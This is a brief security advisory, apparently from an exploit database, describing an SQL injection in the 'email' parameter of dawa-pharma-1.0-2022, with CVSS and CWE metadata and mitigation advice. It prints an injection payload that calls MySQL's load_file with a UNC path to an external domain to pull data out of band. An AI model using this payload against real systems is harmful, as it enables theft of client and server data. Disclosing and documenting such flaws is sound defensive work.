vendor:
dawa-pharma-1.0-2022
by:
nu11secur1ty
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: dawa-pharma-1.0-2022
Affected Version From: dawa-pharma-1.0-2022
Affected Version To: dawa-pharma-1.0-2022
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2023
dawa-pharma-1.0-2022 Multiple-SQLi
The 'email' parameter in dawa-pharma-1.0-2022 is vulnerable to SQL injection attacks. By injecting a malicious payload like '+(select load_file('\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\lhc'))+', an attacker can execute a sub-query to call MySQL's load_file function with a UNC file path pointing to an external domain. This allows the attacker to retrieve sensitive information of clients and access server data.
Mitigation:
To mitigate this vulnerability, sanitize and validate user inputs to prevent SQL injection attacks. Additionally, use parameterized queries or ORM frameworks to interact with the database.